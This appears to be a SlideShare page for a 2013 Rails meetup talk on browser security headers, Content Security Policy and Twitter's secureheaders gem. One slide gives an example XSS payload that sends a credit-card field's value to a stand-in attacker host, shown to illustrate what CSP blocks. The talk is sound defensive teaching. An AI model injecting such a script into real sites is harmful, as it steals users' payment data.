• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
2013: OC Rails Jan - SecureHeaders library and content security policy
 

2013: OC Rails Jan - SecureHeaders library and content security policy

on

  • 1,480 views

Discusses the various security-related browser response headers and the benefits around them. Also introduces the secureheaders gem (https://github.com/twitter/secureheaders) which simplifies the ...

Discusses the various security-related browser response headers and the benefits around them. Also introduces the secureheaders gem (https://github.com/twitter/secureheaders) which simplifies the application

Statistics

Views

Total Views
1,480
Views on SlideShare
1,421
Embed Views
59

Actions

Likes
2
Downloads
11
Comments
0

3 Embeds 59

https://twitter.com 55
https://twimg0-a.akamaihd.net 2
http://www.slashdocs.com 2

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • Hello AppSec USA. My name is Alex Smolen, this is Neil Matatall and this is Justin Collins. We're on Twitter's Product Security team and today we're going to talk to you about security automation at Twitter.
  • Talk about http basic authorization
  • Many of these headers not encourage best practices while providing a better user experience and saving resources
  • Take a survey
  • save resources since nothing is framed
  • Twitter has had clickjacking problems in the past. While xfo does not solve all clickjacking issues, it does solve a very common case and is generally a very quick win that is easy to integrate.
  • hsts preload and max-age
  • Explain how redirecting to https doesn’t protect the initial request Save round trip
  • Explain mixed content: MITM assets Firesheep Cookies sent Supported in webkit (phantomjs) accept arbitrary and safe because inserted scripts won’t execute on* events javascript uris restrict using eval
  • A report from one of our wonderful whitehat reporters gave us a drop of happiness when he said that a successful xss attempt had been thwarted by CSP. TRANSITION: we took stock of what headers were implemented on our properties, and we were not satisfied. They were applied inconsistently and a by a variety of one-off methods.
  • strings or hashes
  • Yeah, some browsers protect you, but not all support it
  • Content security policy defines what can "run" on a page and any deviation creates an alert. And Twitter was an early adopter. We saw that this could not only potentially protect our users, but give a large number of data points as to what the user is experiencing. We have used CSP to help detect XSS and mixed-content by leveraging the reports sent to us by the users' browsers. This compliments the static and dynamic analysis provided by brakeman and phantom-gang in a unique way as we are receiving information from the user. We send the CSP reports to a central scribe host (describe: massively scalable endpoint to collect and aggregate large amounts of data) which writes to hadoop file system which we can run "big data" reports against using pig/scalding. We send this information to SADB where we can search and sort more easily.

2013: OC Rails Jan - SecureHeaders library and content security policy 2013: OC Rails Jan - SecureHeaders library and content security policy Presentation Transcript

  • B Not your typical Rails security talk Header use @ Twitter @ocrails January 30, 2013 @ocrails | @ndm
  • What are headers? @ocrails | @ndm
  • Wait, not those ones @ocrails | @ndm
  • OK, but what are browser headersAuthorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==Accept: text/plainContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101Firefox/12.0 @ocrails | @ndm
  • Response headersCache-Control: max-age=3600ETag: "737060cd8c284d8af7ad3082f209582d"Location: http://www.w3.org/pub/WWW/People.html @ocrails | @ndm
  • I’m already boredTime to get awesomer @ocrails | @ndm
  • Security headersLeverage the browser for security @ocrails | @ndm
  • Sweeeeet. I don’t have write secure code! @ocrails | @ndm
  • Time of convergence @ocrails | @ndm
  • Should you? @ocrails | @ndm
  • Do you use these?Content security policyX-Frame-OptionsHTTP Strict Transport SecurityX-Xss-ProtectionX-Content-Type-Options @ocrails | @ndm
  • X-ContentType-OptionsFixes mime sniffing attacksOnly applies to IE, because only IE woulddo something like thisX-Content-Type-Options = ‘nosniff’zzzzZZZZZZzzzzz @ocrails | @ndm
  • X-Xss-ProtectionUse the browser’s built in XSS AuditorX-Xss-Protection: [0-1](; mode=block)?X-Xss-Protection: 1; mode=block(SCREENSHOT OF BLOCKED SCRIPT)zzzzZZZ... huh? zzzzzzzz @ocrails | @ndm
  • X-Frame-OptionsProtects you from most classes ofClickjackingX-Frame-Options: DENYX-Frame-Options: SAMEORIGINX-Frame-Options: ALLOW FROMexample.comzzz... oh hey thats cool. Don’t frame my stuff. @ocrails | @ndm
  • X-Frame-Options @owaspoc Jan 2013 @ndm | @presidentbeef
  • Firesheep/SSL StripGiven I don’t haven’t received an HSTS headerAnd I have a sessionWhen I visit http://example.comThen I am pwned @ocrails | @ndm
  • Other ssl failsPosting passwords over HTTPLoading mixed contentUsing protocol relative URLS @ocrails | @ndm
  • Strict Transport Security @ocrails | @ndm
  • How hard is it to use?Base CaseStrict-transport-security: max-age=10000000Do all of your subdomains support SSL?Strict-transport-security: max-age=10000000; includeSubdomains(SSL FOR DUMMIES PICTURE) @ocrails | @ndm
  • Content secur-a-wat?Content security policy is reshaping the security modelIt is a complicated spec with great differences across browsersIt is not widely adoptedHowever,It completely eliminates reflected and stored XSSIt ensures that you never load mixed contentIt can protect users with infected browsersIt allows you to accept arbitrary html code from users @ocrails | @ndm
  • Wat? Sounds cool.x-webkit-csp:script-srcstyle-srcimg-srcdefault-srcframe-srcconnect-srcfont-srcmedia-srcobject-srcreport-uri | @ndm @ocrails
  • QuickTime™ and a H.264 decompressor are needed to see this picture.@owaspoc Jan 2013@ndm | @presidentbeef
  • Get rid of XSS, eh?A script-src directive that doesn’t contain ‘unsafe-inline’ almosteliminates most forms of cross site scripting.I WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPT @ocrails | @ndm
  • @owaspoc Jan 2013@ndm | @presidentbeef
  • But I have to...OK, then I’ll inject:<script> var image = new Image(); image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val();</script>FALSE! img-src violation, no XHR allowed @owaspoc Jan 2013 @ndm | @presidentbeef
  • Inline css too? WTF? @ocrails | @ndm
  • Choose your own adventure @ocrails | @ndm
  • Apply all the headers! @ocrails | @ndm
  • How to apply?Secure headers!Open sourced earlier this monthhttps://github.com/twitter/secureheaders @ocrails | @ndm
  • How does it work?It sets a before_filter that applies each headerValues are based on options passed to filter, or in an initializerEasily overriddenSecure by default!!! @ocrails | @ndm
  • What about that security policy thingyThere are > 6 differences between these two header values @ocrails | @ndm
  • Yay for standards @ocrails | @ndm
  • Long hair don’t careAbout browser inconsistencies @ocrails | @ndm
  • Other featuresSet separate policies for http/httpsAutofill chrome-extension: (becoming part of spec)Auto fill missing directives with default value (becoming part of the spec) @ocrails | @ndm
  • You mean there’s more on CSP?The browser sends reports! @ocrails | @ndm
  • What does the report look like?{ "csp-report"=> { "document-uri"=>"http://localhost:3000/home", "referrer"=>"", "blocked-uri"=>"ws://localhost:35729/livereload", "violated-directive"=>"xhr-src ws://localhost.twitter.com:*" }} @ocrails | @ndm
  • Quiz: what does this report indicate?{ "csp-report"=> { "document-uri"=>"http://example.com/welcome", "referrer"=>"", "blocked-uri"=>"self", "violated-directive"=>"inline script base restriction", "source-file"=>"http://example.com/welcome", "script-sample"=>"alert(1)", "line-number"=>81 }} @ocrails | @ndm
  • Header gem to the rescueIt forwards CSP reports for FirefoxIt makes setting an enforce and report only mode easy forexperimentation @ocrails | @ndm
  • Monitor and Tune ALL the things @ocrails | @ndm
  • Splunk @ocrails | @ndm
  • Trending and anomalies @ocrails | @ndm
  • CSP Phantom Gang ThreatDeck Brakeman Roshambo Email Email developers security@owaspoc Jan 2013@ndm | @presidentbeef
  • Who wants to buy me a beer? @ocrails | @ndm